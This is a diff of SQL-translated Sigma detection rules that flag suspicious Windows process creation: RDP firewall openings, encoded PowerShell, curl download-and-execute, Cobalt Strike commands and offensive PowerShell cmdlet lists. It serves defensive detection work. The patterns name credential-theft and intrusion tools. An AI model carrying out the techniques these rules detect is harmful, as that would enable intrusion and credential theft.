- "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" + }, + { + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + }, + { + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "description": "Detects usage of wmic to start or stop a service", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "Stop Windows Service Via Net.EXE", + "id": "88872991-7445-4a22-90b2-a3adadb0e827", + "status": "experimental", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_net_stop_service.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.impact", + "attack.t1485" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "status": "experimental", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR 